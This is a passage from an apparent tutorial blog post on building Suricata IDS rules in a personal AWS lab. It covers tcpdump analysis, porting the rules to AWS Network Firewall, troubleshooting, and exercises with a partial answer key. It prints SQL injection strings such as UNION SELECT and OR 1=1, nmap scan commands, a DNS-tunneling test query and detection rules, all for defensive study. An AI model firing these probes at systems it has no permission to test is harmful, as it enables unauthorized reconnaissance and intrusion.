IP ip-172-31-26-99.58404 &gt; ip-172-31-26-99.ssh: Flags [S] 01:28:36.841903 IP ip-172-31-26-99.58404 &gt; ip-172-31-26-99.domain: Flags [S] 01:28:36.941878 IP ip-172-31-26-99.58404 &gt; ip-172-31-26-99.telnet: Flags [S] 01:28:37.041880 IP ip-172-31-26-99.58404 &gt; ip-172-31-26-99.ftp: Flags [S] </code></pre> </div> <p>The port scan fingerprint is unmistakable — same source port <code>58404</code> hitting smtp, http, ssh, domain, telnet, ftp in sequence, one every 100ms. Also note the PTR reverse DNS lookup immediately before the scan starts — nmap resolving the target IP to a hostname, another reconnaissance indicator.</p> <p><strong>Filter 3 — DNS queries:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>tcpdump <span class="nt">-r</span> /tmp/lab_capture.pcap <span class="nt">-v</span> <span class="s1">'udp port 53'</span> </code></pre> </div> <p>Real output:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>01:26:38.113545 localhost.60801 &gt; _localdnsstub.domain: A? ssm.us-east-1.amazonaws.com. (56) 01:26:38.115187 _localdnsstub.domain &gt; localhost.60801: ssm.us-east-1.amazonaws.com. A xx.xxx.xx.xxx (72) 01:28:36.539101 localhost.39780 &gt; _localdnsstub.domain: PTR? 99.26.31.172.in-addr.arpa. (43) 01:28:36.541638 _localdnsstub.domain &gt; localhost.39780: PTR ip-172-31-26-99.ec2.internal. (85) </code></pre> </div> <p>Two DNS patterns visible: the SSM Agent resolving <code>ssm.us-east-1.amazonaws.com</code> (legitimate — the C2 false positive source), and nmap doing a PTR reverse lookup before scanning. Note the packet sizes — 56-85 bytes, all under the 200-byte threshold in Rule 5.</p> <h3> What the PCAP Tells You </h3> <p>Comparing the PCAP analysis against the Suricata alerts reveals three key insights:</p> <p><strong>1 — Suricata sees the decoded HTTP payload.</strong> The SQL injection strings appear in plaintext in the PCAP because HTTP is unencrypted. <code>GET /?id=1%27+UNION+SELECT...</code> is readable directly from the packet bytes. This confirms why Rules 1 and 2 work — and why they would both fail against HTTPS where the payload is encrypted.</p> <p><strong>2 — Port scans have a clear fingerprint.</strong> Source port <code>58404</code> hitting smtp → http → ssh → domain → telnet → ftp in order, every 100ms. The nmap PTR reverse lookup appearing just before the scan also confirms reconnaissance intent. This pattern looks nothing like normal traffic.</p> <p><strong>3 — DNS packet sizes reveal tunneling.</strong> The legitimate DNS queries in the capture — SSM Agent lookups for <code>ssm.us-east-1.amazonaws.com</code> — are all 56-84 bytes. A real DNS tunneling query with a 180-byte subdomain would stand out immediately. The <code>dsize:&gt;200</code> threshold in Rule 5 exploits this size difference.</p> <p><strong>4 — The false positive source is confirmed.</strong> The PCAP shows the SSM Agent resolving <code>ssm.us-east-1.amazonaws.com</code> every few minutes and connecting to <code>xx.xxx.xx.xxx:443</code>. This is the traffic that was triggering Rule 4 — now whitelisted by the <code>pass tcp $HOME_NET any -&gt; any 443</code> rule.</p> <h3> Summary — Three Attack Patterns in One PCAP </h3> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Timestamp</th> <th>Traffic Type</th> <th>PCAP Indicator</th> </tr> </thead> <tbody> <tr> <td>01:25:37</td> <td>SQL Injection UNION SELECT</td> <td> <code>GET /?id=1%27+UNION+SELECT...</code> in HTTP payload</td> </tr> <tr> <td>01:28:04</td> <td>SQL Injection OR bypass</td> <td> <code>GET /?id=1%27%20OR%201%3D1--</code> in HTTP payload</td> </tr> <tr> <td>01:28:36</td> <td>Port scan</td> <td>Source port 58404, SYN to smtp/http/ssh/telnet/ftp in sequence</td> </tr> <tr> <td>01:26:38+</td> <td>AWS SSM beaconing (legitimate)</td> <td>DNS A? ssm.us-east-1.amazonaws.com + HTTPS to AWS IPs</td> </tr> </tbody> </table></div> <p><code>tcpdump</code> and Suricata are complementary tools — Suricata tells you something is wrong, <code>tcpdump</code> shows you exactly what it was at the packet level.</p> <h3> Downloading the PCAP for Wireshark Analysis (Optional) </h3> <p>If you want to open the PCAP in Wireshark on your local machine, copy it to S3 first:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># On the instance — replace with your own bucket name</span> aws s3 <span class="nb">cp</span> /tmp/lab_capture.pcap s3://your-bucket-name/lab_capture.pcap <span class="c"># On your local machine</span> aws s3 <span class="nb">cp </span>s3://your-bucket-name/lab_capture.pcap ~/Downloads/lab_capture.pcap <span class="nt">--profile</span> lab-sso </code></pre> </div> <p>Open <code>lab_capture.pcap</code> in Wireshark and apply the same filters:</p> <ul> <li>HTTP traffic: <code>tcp.port == 80</code> </li> <li>SYN scans: <code>tcp.flags.syn == 1 &amp;&amp; tcp.flags.ack == 0</code> </li> <li>Large DNS queries: <code>dns &amp;&amp; frame.len &gt; 200</code> </li> </ul> <h2> Part 8: AWS Network Firewall Connection </h2> <p>A key insight worth highlighting: <strong>Suricata rule syntax IS the AWS Network Firewall rule language.</strong></p> <p>As of November 2020, AWS Network Firewall uses Suricata-compatible IPS rules natively. Every rule written in this lab is directly portable to AWS Network Firewall with no modifications required.</p> <p>Source: <a href="https://aws.amazon.com/blogs/opensource/scaling-threat-prevention-on-aws-with-suricata/" rel="noopener noreferrer">AWS Open Source Blog — Scaling Threat Prevention on AWS with Suricata</a></p> <p>This means learning Suricata rule syntax in a personal lab is not just an academic exercise — it is the exact same skill used to configure production-grade network threat prevention in AWS.</p> <h3> What is AWS Network Firewall? </h3> <p>AWS Network Firewall is a managed network security service that sits at the VPC perimeter and inspects traffic flowing in and out of your AWS infrastructure. Unlike a security group (which operates at the instance level with simple allow/deny rules) or a WAF (which operates at the HTTP application layer), Network Firewall operates at the network layer and can inspect full packet payloads — including the kind of deep packet inspection Suricata performs.</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Tool</th> <th>Layer</th> <th>What it inspects</th> </tr> </thead> <tbody> <tr> <td>Security Group</td> <td>Network (L3/L4)</td> <td>IP, port, protocol — no payload</td> </tr> <tr> <td>AWS WAF</td> <td>Application (L7)</td> <td>HTTP headers, URI, body</td> </tr> <tr> <td>AWS Network Firewall</td> <td>Network + Application (L3-L7)</td> <td>Full packet payload using Suricata rules</td> </tr> </tbody> </table></div> <h3> Porting Your Rules to AWS Network Firewall </h3> <p>The 5 rules from this lab are directly usable in AWS Network Firewall. Here is how you would deploy them:</p> <p><strong>Step 1 — Create a rule group in the AWS Console:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight plaintext"><code>AWS Console → VPC → Network Firewall → Rule groups → Create rule group → Rule group type: Stateful → Rule order: Default action order → Capacity: 100 → Rules format: Suricata compatible rule string </code></pre> </div> <p><strong>Step 2 — Paste your rules directly:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>pass http <span class="nv">$HOME_NET</span> any -&gt; 169.254.169.254 any <span class="o">(</span>msg:<span class="s2">"IMDS traffic - whitelist"</span><span class="p">;</span> sid:9000010<span class="p">;</span> rev:1<span class="p">;</span><span class="o">)</span> pass tcp <span class="nv">$HOME_NET</span> any -&gt; any 443 <span class="o">(</span>msg:<span class="s2">"AWS HTTPS services whitelist"</span><span class="p">;</span> sid:9000011<span class="p">;</span> rev:1<span class="p">;</span><span class="o">)</span> alert tcp any any -&gt; <span class="nv">$HOME_NET</span> any <span class="o">(</span>msg:<span class="s2">"SQL Injection UNION SELECT Attempt"</span><span class="p">;</span> content:<span class="s2">"UNION"</span><span class="p">;</span> nocase<span class="p">;</span> content:<span class="s2">"SELECT"</span><span class="p">;</span> nocase<span class="p">;</span> sid:9000001<span class="p">;</span> rev:4<span class="p">;</span><span class="o">)</span> alert tcp any any -&gt; <span class="nv">$HOME_NET</span> 80 <span class="o">(</span>msg:<span class="s2">"SQL Injection Comment Bypass Attempt"</span><span class="p">;</span> content:<span class="s2">"OR"</span><span class="p">;</span> nocase<span class="p">;</span> content:<span class="s2">"="</span><span class="p">;</span> nocase<span class="p">;</span> sid:9000002<span class="p">;</span> rev:6<span class="p">;</span><span class="o">)</span> alert tcp any any -&gt; <span class="nv">$HOME_NET</span> any <span class="o">(</span>msg:<span class="s2">"Possible Port Scan Detected"</span><span class="p">;</span> flags:S<span class="p">;</span> threshold:type threshold,track by_src,count 5,seconds 10<span class="p">;</span> sid:9000003<span class="p">;</span> rev:3<span class="p">;</span><span class="o">)</span> alert tcp <span class="nv">$HOME_NET</span> any -&gt; any any <span class="o">(</span>msg:<span class="s2">"Possible C2 Beaconing Detected"</span><span class="p">;</span> flow:to_server,established<span class="p">;</span> threshold:type both,track by_src,count 10,seconds 60<span class="p">;</span> sid:9000004<span class="p">;</span> rev:2<span class="p">;</span><span class="o">)</span> alert udp any any -&gt; any 53 <span class="o">(</span>msg:<span class="s2">"Possible DNS Tunneling - Large Query"</span><span class="p">;</span> dsize:&gt;200<span class="p">;</span> sid:9000005<span class="p">;</span> rev:2<span class="p">;</span><span class="o">)</span> </code></pre> </div> <p><strong>Step 4 — Configure advanced settings (optional)</strong></p> <p>Leave "Customize encryption settings (advanced)" unchecked. AWS encrypts your rule group data at rest using an AWS managed key by default — sufficient for a personal lab. Customer managed KMS keys are for production environments with compliance requirements (PCI-DSS, HIPAA) where you need audit trails of key usage.</p> <p>Click <strong>Next</strong>.</p> <p><strong>Step 5 — Add tags (optional)</strong></p> <p>Skip for a personal lab. Click <strong>Next</strong>.</p> <p><strong>Step 6 — Review and create</strong></p> <p>Verify:</p> <ul> <li>Rule group type: Stateful, Suricata compatible rule string</li> <li>Name: <code>suricata-lab-rules</code> </li> <li>Capacity: <code>100</code> </li> <li>Rule variables: <code>HOME_NET</code> IP set showing <code>172.31.16.0/20</code> </li> <li>All 7 rules visible in the Suricata compatible rule string section</li> <li>Customer managed key: AWS owned key</li> </ul> <p>Click <strong>Create rule group</strong>.</p> <h3> Important: Creating the Rule Group Is Not Enough </h3> <p>Creating <code>suricata-lab-rules</code> saves your ruleset in AWS but does <strong>not</strong> automatically enforce it on your VPC or any EC2 instances you launch. Three additional steps are required before traffic is actually inspected:</p> <p><strong>1 — Create a Firewall Policy</strong> — a container that references one or more rule groups including <code>suricata-lab-rules</code>.</p> <p><strong>2 — Create a Network Firewall</strong> — the actual firewall resource deployed into a subnet inside your VPC, with the firewall policy attached to it.</p> <p><strong>3 — Update VPC Route Tables</strong> — the most critical step. You must redirect traffic through the firewall by updating your route tables. Without this, traffic bypasses the firewall entirely even if it is deployed and running.</p> <p><strong>Why this lab stops at rule group creation:</strong> AWS Network Firewall is designed for production VPC architectures with proper subnet segmentation, internet gateways, and routing. Fully deploying it in a single-subnet personal lab is architecturally complex and costs approximately $0.395/hour for the firewall endpoint alone — which adds up quickly on a free tier account.</p> <p>The value of this exercise is demonstrating that your Suricata rules are valid AWS Network Firewall rules — directly portable from your personal lab to production AWS infrastructure. The full VPC security architecture required to deploy Network Firewall end-to-end is a Week 49-50 topic (Cloud Security Mastery phase).</p> <h3> IDS vs IPS Mode </h3> <p>In this lab Suricata ran in <strong>IDS mode</strong> — it inspected traffic and generated alerts but did not block anything. AWS Network Firewall runs in <strong>IPS mode</strong> by default — it can actively drop packets that match your rules.</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Mode</th> <th>Action on match</th> <th>Use case</th> </tr> </thead> <tbody> <tr> <td>IDS (alert)</td> <td>Log and alert only</td> <td>Learning, tuning, baseline establishment</td> </tr> <tr> <td>IPS (drop)</td> <td>Block the traffic</td> <td>Production enforcement</td> </tr> </tbody> </table></div> <p>The typical progression is: run in IDS mode first to tune your rules and eliminate false positives, then switch to IPS mode once you are confident the rules are accurate. Deploying IPS rules with false positives in production will block legitimate traffic.</p> <h3> Why This Matters for Security Engineering </h3> <p>Understanding that Suricata rules are portable to AWS Network Firewall positions you to:</p> <ul> <li>Write detection rules in a free personal lab and deploy them directly to production AWS infrastructure</li> <li>Contribute to an organization's AWS Network Firewall ruleset using the same skills tested in this lab</li> <li>Discuss network-layer threat detection intelligently in Security Engineering interviews — the gap between "I ran Suricata in a lab" and "I understand how this maps to production cloud infrastructure" is exactly what separates strong candidates</li> </ul> <h2> Common Issues and Fixes </h2> <h3> Disabling a Rule Without Deleting It </h3> <p>Comment out the rule with <code>#</code> at the start of the line:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>nano /etc/suricata/rules/custom.rules </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>alert tcp any any -&gt; <span class="nv">$HOME_NET</span> 80 <span class="o">(</span>msg:<span class="s2">"SQL Injection UNION SELECT Attempt"</span><span class="p">;</span> ...<span class="o">)</span> <span class="c"># alert http $HOME_NET any -&gt; any any (msg:"Possible C2 Beaconing Detected"; ...)</span> alert udp any any -&gt; any 53 <span class="o">(</span>msg:<span class="s2">"Possible DNS Tunneling - Large Query"</span><span class="p">;</span> ...<span class="o">)</span> </code></pre> </div> <p>The <code>#</code> tells Suricata to ignore that line entirely — the rule is preserved for future use but not loaded into the detection engine.</p> <h3> Reloading Rules Without Restarting Suricata </h3> <p>For a personal lab, the simplest approach is always:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>systemctl restart suricata </code></pre> </div> <p>In <strong>production</strong> environments where you cannot afford dropped packets or downtime during a rule update, two zero-downtime options exist:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Option 1 — send USR2 signal to the running process</span> <span class="nb">sudo kill</span> <span class="nt">-USR2</span> <span class="si">$(</span><span class="nb">cat</span> /var/run/suricata.pid<span class="si">)</span> <span class="c"># Option 2 — use the Suricata socket command</span> <span class="nb">sudo </span>suricatasc <span class="nt">-c</span> ruleset-reload-nonblocking </code></pre> </div> <p>Both hot-swap rules into the running detection engine without interrupting traffic inspection — relevant when Suricata is running on a live network at a cloud provider or enterprise SOC where restarting would cause a monitoring gap.</p> <p>Verify the reload worked by checking the rule count:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo grep</span> <span class="s2">"signatures processed"</span> /var/log/suricata/suricata.log | <span class="nb">tail</span> <span class="nt">-3</span> </code></pre> </div> <h3> Suricata Config Test Requires Root </h3> <p>Running <code>suricata -T</code> as a normal user returns a permission denied error. Always run config tests as root:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>suricata <span class="nt">-T</span> <span class="nt">-c</span> /etc/suricata/suricata.yaml <span class="nt">-v</span> </code></pre> </div> <h3> Rules Not Firing on Self-Generated Traffic </h3> <p><strong>Symptom:</strong> curl requests to the instance's own IP return 200 OK but <code>fast.log</code> stays empty.</p> <p><strong>Cause:</strong> Linux kernel local routing — when a process connects to the machine's own IP address, traffic routes through the loopback interface <code>lo</code> rather than <code>enX0</code>. Suricata only monitoring <code>enX0</code> never sees it.</p> <p><strong>Fix:</strong> Add <code>lo</code> to the <code>af-packet</code> section in <code>suricata.yaml</code>:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">af-packet</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">interface</span><span class="pi">:</span> <span class="s">enX0</span> <span class="pi">-</span> <span class="na">interface</span><span class="pi">:</span> <span class="s">lo</span> </code></pre> </div> <p>Restart Suricata after making this change.</p> <h3> 49,000+ Rules Loaded Instead of Your Custom Rules </h3> <p><strong>Symptom:</strong> <code>suricata.log</code> shows tens of thousands of signatures loaded instead of your custom rule count.</p> <p><strong>Cause:</strong> The <code>rule-files:</code> section in <code>suricata.yaml</code> still references <code>suricata.rules</code> (the Emerging Threats ruleset) alongside your custom rules file.</p> <p><strong>Fix:</strong> Edit <code>suricata.yaml</code> to only reference your custom rules:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="na">rule-files</span><span class="pi">:</span> <span class="pi">-</span> <span class="s">/etc/suricata/rules/custom.rules</span> </code></pre> </div> <p>Always verify with:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo grep</span> <span class="s2">"signatures processed"</span> /var/log/suricata/suricata.log | <span class="nb">tail</span> <span class="nt">-1</span> </code></pre> </div> <h3> eve.json Shows Large Rule Counts from Previous Sessions </h3> <p><strong>Symptom:</strong> <code>grep "rules_loaded" /var/log/suricata/eve.json</code> shows 49,000+ rules even after fixing <code>suricata.yaml</code>.</p> <p><strong>Cause:</strong> <code>eve.json</code> contains periodic stats entries from all previous Suricata sessions — including old runs with the full ET ruleset. It does not reflect the current session accurately.</p> <p><strong>Fix:</strong> Always use <code>suricata.log</code> not <code>eve.json</code> to confirm the current session's rule count. If needed, parse <code>eve.json</code> line by line:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo tail</span> <span class="nt">-20</span> /var/log/suricata/eve.json | <span class="k">while </span><span class="nb">read </span>line<span class="p">;</span> <span class="k">do </span><span class="nb">echo</span> <span class="nv">$line</span> | python3 <span class="nt">-m</span> json.tool 2&gt;/dev/null<span class="p">;</span> <span class="k">done</span> </code></pre> </div> <h3> HTTP Rules Not Matching URL-Encoded Payloads </h3> <p><strong>Symptom:</strong> Rules using <code>protocol http</code> with <code>content:"UNION"</code> do not fire on curl requests containing <code>UNION%20SELECT</code>.</p> <p><strong>Cause:</strong> Suricata's <code>http</code> protocol keyword applies content matching to normalized HTTP buffers. Without specifying the correct buffer (<code>http_uri</code>, <code>http_client_body</code>, etc.) the match may not hit the right place.</p> <p><strong>Fix:</strong> Switch to <code>tcp</code> protocol with <code>port 80</code> which matches raw TCP stream bytes directly:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>alert tcp any any -&gt; <span class="nv">$HOME_NET</span> 80 <span class="o">(</span>msg:<span class="s2">"SQL Injection UNION SELECT Attempt"</span><span class="p">;</span> content:<span class="s2">"UNION"</span><span class="p">;</span> nocase<span class="p">;</span> content:<span class="s2">"SELECT"</span><span class="p">;</span> nocase<span class="p">;</span> sid:9000001<span class="p">;</span> rev:4<span class="p">;</span><span class="o">)</span> </code></pre> </div> <h3> Port Scan Rule Not Firing </h3> <p><strong>Symptom:</strong> nmap scan completes but no alert appears in <code>fast.log</code>.</p> <p><strong>Two common causes:</strong></p> <ol> <li><p><strong>Scanning <code>127.0.0.1</code> instead of the real IP</strong> — the destination must fall within <code>$HOME_NET</code>. Use the instance's real IP (e.g. <code>172.31.23.15</code>).</p></li> <li><p><strong>nmap firing too fast for a single-core t2.micro</strong> — use <code>--max-rate 10</code> to limit nmap to 10 packets per second, and lower the threshold to <code>count 5</code>:<br> </p></li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>nmap <span class="nt">-sS</span> <span class="nt">--max-rate</span> 10 172.31.23.15 </code></pre> </div> <h3> C2 Beaconing False Positives from AWS Services </h3> <p><strong>Symptom:</strong> Rule 4 fires immediately after Suricata starts, alerting on traffic to <code>169.254.169.254</code> and various port 443 endpoints.</p> <p><strong>Cause:</strong> The SSM Agent, CloudWatch, and other AWS services make regular outbound HTTPS calls that match the beaconing threshold. These are legitimate AWS service endpoints.</p> <p><strong>Fix:</strong> Add two <code>pass</code> rules at the top of <code>custom.rules</code> — before all alert rules:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>pass http <span class="nv">$HOME_NET</span> any -&gt; 169.254.169.254 any <span class="o">(</span>msg:<span class="s2">"IMDS traffic - whitelist"</span><span class="p">;</span> sid:9000010<span class="p">;</span> rev:1<span class="p">;</span><span class="o">)</span> pass tcp <span class="nv">$HOME_NET</span> any -&gt; any 443 <span class="o">(</span>msg:<span class="s2">"AWS HTTPS services whitelist"</span><span class="p">;</span> sid:9000011<span class="p">;</span> rev:1<span class="p">;</span><span class="o">)</span> </code></pre> </div> <p>Pass rules must come first — Suricata processes rules top to bottom and stops at the first match.</p> <h3> DNS Label Too Long Error </h3> <p><strong>Symptom:</strong> <code>dig: 'AAAA...180chars.google.com' is not a legal name (label too long)</code></p> <p><strong>Cause:</strong> DNS labels (the parts between dots) have a maximum length of 63 characters. A single string of 180 A's exceeds this.</p> <p><strong>Fix:</strong> Split across multiple 60-character labels:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>dig <span class="si">$(</span>python3 <span class="nt">-c</span> <span class="s2">"print('A'*60 + '.' + 'B'*60 + '.' + 'C'*60)"</span><span class="si">)</span>.google.com @8.8.8.8 </code></pre> </div> <h2> Practice Exercises </h2> <p>These five exercises test the core Suricata skills a Security Engineer specializing in web application and cloud security is expected to have. No installation required — read, analyze, and answer.</p> <h3> Exercise 1 — Read and Interpret </h3> <p>Given this rule you have never seen before, explain in plain English what it does, what attack it is designed to detect, and what each keyword means:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>alert http any any -&gt; <span class="nv">$HOME_NET</span> any <span class="o">(</span>msg:<span class="s2">"Possible XSS Attempt"</span><span class="p">;</span> flow:to_server,established<span class="p">;</span> content:<span class="s2">"&lt;script&gt;"</span><span class="p">;</span> nocase<span class="p">;</span> http_uri<span class="p">;</span> sid:9000010<span class="p">;</span> rev:1<span class="p">;</span><span class="o">)</span> </code></pre> </div> <p>Answer these questions:</p> <ol> <li>What protocol does this rule inspect?</li> <li>What direction is traffic flowing?</li> <li>What string is it looking for and where specifically (<code>http_uri</code> is a new keyword — what do you think it does)?</li> <li>What attack is this trying to detect?</li> <li>Name one way an attacker could evade this rule.</li> </ol> <h3> Exercise 2 — Modify: Tune a Threshold </h3> <p>The port scan rule from this post is generating too many false positives on a busy web server that receives high volumes of legitimate connection attempts from load balancers.</p> <p>Original rule:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>alert tcp any any -&gt; <span class="nv">$HOME_NET</span> any <span class="o">(</span>msg:<span class="s2">"Possible Port Scan Detected"</span><span class="p">;</span> flags:S<span class="p">;</span> threshold:type threshold,track by_src,count 5,seconds 10<span class="p">;</span> sid:9000003<span class="p">;</span> rev:3<span class="p">;</span><span class="o">)</span> </code></pre> </div> <p><strong>Task:</strong> Modify the rule to reduce false positives by:</p> <ol> <li>Raising the threshold so it only alerts when a single source IP sends more than 50 SYN packets within 10 seconds</li> <li>Narrowing the destination to only flag scans targeting ports below 1024 (well-known ports) — hint: use <code>port</code> ranges in the destination field</li> <li>Increment the <code>rev</code> number to reflect the modification</li> </ol> <p>Write the modified rule.</p> <h3> Exercise 3 — Enable, Disable, and Organize </h3> <p>You have the following three rules in <code>/etc/suricata/rules/custom.rules</code>. The C2 beaconing rule (sid:9000004) is generating hundreds of false positives because your monitoring tool makes frequent outbound HTTP calls.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>alert tcp any any -&gt; <span class="nv">$HOME_NET</span> 80 <span class="o">(</span>msg:<span class="s2">"SQL Injection UNION SELECT Attempt"</span><span class="p">;</span> content:<span class="s2">"UNION"</span><span class="p">;</span> nocase<span class="p">;</span> content:<span class="s2">"SELECT"</span><span class="p">;</span> nocase<span class="p">;</span> sid:9000001<span class="p">;</span> rev:4<span class="p">;</span><span class="o">)</span> alert http <span class="nv">$HOME_NET</span> any -&gt; any any <span class="o">(</span>msg:<span class="s2">"Possible C2 Beaconing Detected"</span><span class="p">;</span> flow:to_server,established<span class="p">;</span> threshold:type both,track by_src,count 10,seconds 60<span class="p">;</span> sid:9000004<span class="p">;</span> rev:1<span class="p">;</span><span class="o">)</span> alert udp any any -&gt; any 53 <span class="o">(</span>msg:<span class="s2">"Possible DNS Tunneling - Large Query"</span><span class="p">;</span> dsize:&gt;200<span class="p">;</span> sid:9000005<span class="p">;</span> rev:1<span class="p">;</span><span class="o">)</span> </code></pre> </div> <p><strong>Task:</strong></p> <ol> <li>Disable the C2 beaconing rule without deleting it — how do you do this in Suricata?</li> <li>Reload the rules without restarting Suricata entirely — what command do you use?</li> <li>Verify the rule is disabled — where do you look to confirm it is no longer generating alerts?</li> </ol> <h3> Exercise 4 — Keyword Identification </h3> <p>For each behavior described below, identify which Suricata keyword is responsible for it in the rules from this post:</p> <div class="table-wrapper-paragraph"><table> <thead> <tr> <th>Behavior</th> <th>Keyword</th> </tr> </thead> <tbody> <tr> <td>Only fires after 5 matching packets from the same source in 10 seconds</td> <td>?</td> </tr> <tr> <td>Makes string matching case-insensitive</td> <td>?</td> </tr> <tr> <td>Restricts the rule to outbound traffic from your subnet</td> <td>?</td> </tr> <tr> <td>Ensures a second content match starts immediately after the first with zero bytes between them</td> <td>?</td> </tr> <tr> <td>Matches UDP packets larger than 200 bytes</td> <td>?</td> </tr> <tr> <td>Only applies to established TCP connections flowing toward the server</td> <td>?</td> </tr> <tr> <td>Allows matching traffic to pass without triggering any alert rules below it</td> <td>?</td> </tr> </tbody> </table></div> <blockquote> <p><strong>Note on the fourth row:</strong> The keyword <code>distance:0</code> enforces that a second <code>content</code> match must appear immediately after the first — zero bytes between them. For example <code>content:"UNION"; content:"SELECT"; distance:0;</code> would only match <code>UNIONSELECT</code> not <code>UNION SELECT</code> (with a space). This keyword was part of the original Rule 1 design in this lab but was removed after it prevented the rule from firing on URL-encoded payloads where a <code>+</code> or <code>%20</code> separates the words. In production rules you would handle this with <code>pcre</code> instead.</p> </blockquote> <h3> Exercise 5 — Community Rulesets </h3> <blockquote> <p>⚠️ <strong>Before starting this exercise:</strong> If you re-enabled the C2 beaconing rule (sid:9000004) at any point, comment it out again now. The ET ruleset loaded in this exercise generates significant alert volume and the C2 rule will produce dozens of false positives from AWS services that will make it difficult to observe what the ET ruleset is doing. Keep it commented out until you have fully whitelisted all legitimate AWS traffic.</p> </blockquote> <p>Emerging Threats (ET) is one of the most widely used open source Suricata/Snort ruleset providers. Their rules cover thousands of known attack patterns, malware families, and CVEs.</p> <p><strong>Task — run these steps in order:</strong></p> <ol> <li>Run <code>suricata-update list-sources</code> on your instance — how many rule sources are available by default?</li> <li>Enable the Emerging Threats Open ruleset: <code>sudo suricata-update enable-source et/open</code> </li> <li>Update and reload — <strong>both commands must complete before checking the rule count:</strong> </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo </span>suricata-update <span class="nb">sudo </span>systemctl restart suricata </code></pre> </div> <ol> <li>Count how many rules are now loaded by checking the Suricata log — run this <em>after</em> Step 3: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">sudo grep</span> <span class="s2">"signatures processed"</span> /var/log/suricata/suricata.log | <span class="nb">tail</span> <span class="nt">-1</span> </code></pre> </div> <p>You should see tens of thousands of signatures, not 6. If you still see 6, Step 3 did not complete successfully — check <code>suricata-update</code> output for errors.</p> <ol> <li>Find the ET rules related to SQL injection: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">grep</span> <span class="nt">-i</span> <span class="s2">"sql injection"</span> /var/lib/suricata/rules/suricata.rules | <span class="nb">wc</span> <span class="nt">-l</span> </code></pre> </div> <p>How many rules does ET have for SQL injection compared to the 2 you wrote?</p> <p>Reflect: what is the tradeoff between using a large community ruleset versus writing your own targeted rules?</p> <p>These exercises are part of an open source repository of LeetCode-style <strong>secure coding exercises</strong> designed to:</p> <ol> <li>Train developers to write secure code</li> <li>Prepare security engineers for technical interviews</li> </ol> <p>Every exercise in the repo has 60+ test cases and a companion Dev.to post.</p> <p><strong>If this post was useful, the best thing you can do is star the repo:</strong></p> <p><strong>👉 <a href="https://github.com/fosres/SecEng-Exercises" rel="noopener noreferrer">github.com/fosres/SecEng-Exercises</a></strong></p> <h2> One More Thing — Quick Poll </h2> <p>Why do you read security engineering blog posts? Your answer helps me write better content:</p> <p><strong>👉 <a href="https://strawpoll.com/wby5QoKAkyA" rel="noopener noreferrer">Take the poll</a></strong></p> <p>Takes 10 seconds.</p> <h2> Answer Key </h2> <h3> Exercise 1 </h3> <ol> <li><p>HTTP protocol.</p></li> <li><p>Traffic flows from the public internet to the home network.</p></li> <li><p>The Suricata rule is looking for the existence of an XSS payload within the submitted URL. That is what <code>http_uri</code> represents: the submitted URL. Judging by the filtering for the <code>&lt;script&gt;</code> tag the rule is looking for XSS attacks targeting HTML bodies or HTML attributes.</p></li> <li><p>See previous answer.</p></li> <li><p>The attacker can apply percent encoding to evade this rule.</p></li> </ol> <h3> Exercise 2 </h3> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>alert tcp any any -&gt; <span class="nv">$HOME_NET</span> 1:1024 <span class="o">(</span>msg:<span class="s2">"Possible Port Scan Detected"</span><span class="p">;</span> flags:S<span class="p">;</span> threshold:type threshold,track by_src,count 50,seconds 10<span class="p">;</span> sid:9000003<span class="p">;</span> rev:4<span class="p">;</span><span class="o">)</span> </code></pre> </div> <h3> Exercise 3 </h3> <p>Disabled rule:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code>alert tcp any any -&gt; <span class="nv">$HOME_NET</span> 80 <span class="o">(</span>msg:<span class="s2">"SQL Injection UNION SELECT Attempt"</span><span class="p">;</span> content:<span class="s2">"UNION"</span><span class="p">;</span> nocase<span class="p">;</span> content:<span class="s2">"SELECT"</span><span class="p">;</span> nocase<span class="p">;</span> sid:9000001<span class="p">;</span> rev:4<span class="p">;</span><span class="o">)</span> <span class="c"># alert http $HOME_NET any -&gt; any any (msg:"Possible C2 Beaconing Detected"; flow:to_server,established; threshold:type both,track by_src,count 10,seconds 60; sid:9000004; rev:1;)</span> alert udp any any -&gt; any 53 <span class="o">(</span>msg:<span class="s2">"Possible DNS Tunneling - Large Query"</span><span class="p">;</span> dsize:&gt;200<span class="p">;</span> sid:9000005<span class="p">;</span> rev:1<span class="p">;</span><span class="o">)</span> </code></pre> </div> <p>I used <code>systemctl restart suricata</code> because there is no point in doing this in a way that is more complicated. To verify the false positives no longer appear:<br> </p> <div 